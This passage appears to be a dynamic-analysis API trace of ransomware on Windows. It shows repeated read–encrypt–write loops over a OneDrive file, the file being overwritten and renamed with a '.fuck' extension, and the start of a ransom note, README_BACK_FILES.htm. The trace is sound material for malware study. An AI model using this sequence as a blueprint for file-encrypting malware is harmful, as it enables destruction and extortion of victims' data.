nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.192] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.192] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.192] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.192] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.193] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.193] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.193] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.193] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.193] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.193] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.194] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.194] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.194] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.194] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.194] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.195] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.195] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.196] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.196] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.196] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.196] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.196] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.197] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.197] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.197] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.197] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.197] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.197] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.198] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.198] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.198] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.198] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.198] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0276.198] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0276.199] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0276.199] CloseHandle (hObject=0x5d48) returned 1 [0276.199] CloseHandle (hObject=0x5d3c) returned 1 [0276.199] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.205] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.205] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.207] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.209] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.209] CryptDestroyKey (hKey=0x2fb3c8) returned 1 [0276.209] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.209] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.209] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.210] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\readme_back_files.htm")) returned 0xffffffff [0276.210] AreFileApisANSI () returned 1 [0276.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.211] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.212] GetFileType (hFile=0x5d4c) returned 0x1 [0276.212] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, 